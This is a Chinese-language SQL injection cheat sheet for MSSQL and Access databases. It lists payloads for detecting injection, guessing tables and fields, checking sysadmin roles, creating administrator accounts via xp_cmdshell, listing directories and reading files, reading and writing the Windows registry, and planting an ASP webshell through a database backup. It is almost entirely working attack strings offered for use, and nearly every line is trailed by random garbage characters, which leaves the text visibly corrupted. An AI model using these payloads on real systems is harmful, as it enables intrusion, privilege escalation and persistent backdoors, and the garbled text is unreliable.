1.判断是否有注入;and 1=1 ;and 1=2 rT��j��V/~
2.初步判断是否是mssql ;and user>0 VZ8HnNAb�X
�Ni[2 �p�
3.注入参数是字符'and [查询条件] and ''=' s9A���q-�N
�YS5�Pt)�?
4.搜索时没过滤参数的'and [查询条件] and '%25'=' YQ}�bG�{�V
I�z\I��Qa�
5.判断数据库系统 P�O�[
AP%;
�)0JXU�C e
;and (select count(*) from sysobjects)>0 mssql dF%sD|<)�
%O�t^�G%34
;and (select count(*) from msysobjects)>0 access 438+�zU���
9RoN,e8!�
�-��\!"Kz/
+�;J�b��)8
6.猜数据库 ;and (select Count(*) from [数据库名])>0 V{[v��It*�
��w|>O!]K]
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 fhAK�^@h
\�{�G1d"�n
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �rSVU|O3m;
9+\3E��4K�
9.(1)猜字段的ascii值(access) �I�2=?H��<
r9@Q=�"J_)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8L�<G��Ae�
�zl j%v/9
(2)猜字段的ascii值(mssql) it~>�)_7*P
^�L�(}�c�O
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;$\d^i�{N
/�CAi%UH,F
10.测试权限结构(mssql) S&@uY#_(*T
1�dF��=BR8
Zv*Z�^; X9
�MKYXY�R��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~',<�7�eW�
~E=.*�: 5(
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- {�A�h\�-{]
r~uWr'}a�}
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Y.�qlY3iBp
yU�~OfwQ��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 3cNF�^?\=�
P�2h}3%cJq
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- o5\nq�w�^�
v(\k�S��lJ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
^�t�=H�l�
c"��3 a�,&
;and 1=(select IS_MEMBER('db_owner'));-- fRe��$}KX�
[*O�#6�X�u
qsUlfv9L�6
UJ_E�&7,L�
11.添加mssql和系统的帐户 H�Kk;o�G�
�eGS1% �[
;exec master.dbo.sp_addlogin username;-- MH`H[2<\!,
;exec master.dbo.sp_password null,username,password;-- 0SXWt?� }�
hg�C�eU+�H
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- XU �H�u=2F
��(DCC4%w"
;exec master.dbo.xp_cmdshell 'net user username password ?3"bu$@8
P"%i� 4�-S
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �"]��ow�1{
-So&?3,\A@
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �'~�3a(1@8
Z_�Ox���'�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- O1Gd_wDC/i
SB1�\SN�B�
@�O<kjR�<b
xr)�Rx{)3h
12.(1)遍历目录 K4i#:7r'�b
zl�mb�_akJ
;create table dirs(paths varchar(100), id int) AN�y=f�-V�
�S�xYX`NQ�
;insert dirs exec master.dbo.xp_dirtree 'c:\' +!��6�C^G�
Y� B@\"|}�
;and (select top 1 paths from dirs)>0 �`5;O|qRq�
#e0�t�T�+
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 93y�JAao9�
+.K�m�p�w4
q79)nhC F�
��Z<Rz}8s�
(2)遍历目录 ��xQ�C�.ap
ysfR@ sH�7
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- W
xyQA:3s
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �t�i)fo�am
��<�`��sVu
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 u�l+
�+h4N
���wxARD3%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 gOZ�$rv�^g
9)Y]05�u�s
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }> k��9]�Y
�L�=Q-�r[�
z]�>�� �0A
'2a��}��1?
13.mssql中的存储过程 t$8f:*6(�*
_cx}e!BK#�
xp_regenumvalues 注册表根键, 子键 '��+NmHu:q
v�9Oyboh(y
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �VY$hg���
;8;n�Y6�Ie
xp_regread 根键,子键,键值名 G6xdG��UM
EN()d�CQHr
;exec xp_regread �eP-q[U?$n
o�(w�1!spA
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Y'�-�BKZv!
6�Tx�Z^�&=
xp_regwrite 根键,子键, 值名, 值类型, 值 Z mF}pa,gd
b7{)�B?n�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ="R�Dcf/��
Dg/&�m*�Yl
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 L@����w|2�
��*KF���:�
xp_regdeletevalue 根键,子键,值名 o�Yn��A� 3
�O��B8f�Fd
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 '�M���Pt K
8zG�e5Dn9�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 'i_od|19~h
�
��"�/6�(
X%�xX3e'��
�B5u0�6�O
14.mssql的backup创建webshell �=�M)>�w4-
�L��4'@f�
use model "[(_C&Ot�4
)h�,+��>U@
create table cmd(str image); �zT�B�r�<:
<DiD�8")�4
insert into cmd(str) values (''); N
VzR���2
Z�r�nZ7,!@
backup database model to disk='c:\l.asp'; v
I@Wuu��:
�R>Fie5�?�
@"-<�m|lM�
�%xf6�U>T�
15.mssql内置函数 4s~Y�qP�{K
�IP�$^�)t[
;and (select @@version)>0 获得Windows的版本号 �~" �B0P>7
�qr$=oCqa�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa s
�d>&6�R^
kg7oH�.0E�
;and (select user_name())>0 爆当前系统的连接用户 g/W<;o<v(I
cUaLv1:H�I
;and (select db_name())>0 得到当前连接的数据库 R~CQ=��KQ.
e�CMcr !.
G�k*Mx6|N
�1?`,h6d*=
16.简洁的webshell q�*T�H),)J
\�y{Bn�p5h
use model �9M:wUY�HT
T�.��G�Y��
create table cmd(str image); �M5H�KRL�t
�*f$�mSI=�
insert into cmd(str) values (''); f
GE+DjeA
/�K�:�M
,q
backup database model to disk='g:\wwwtest\l.asp';
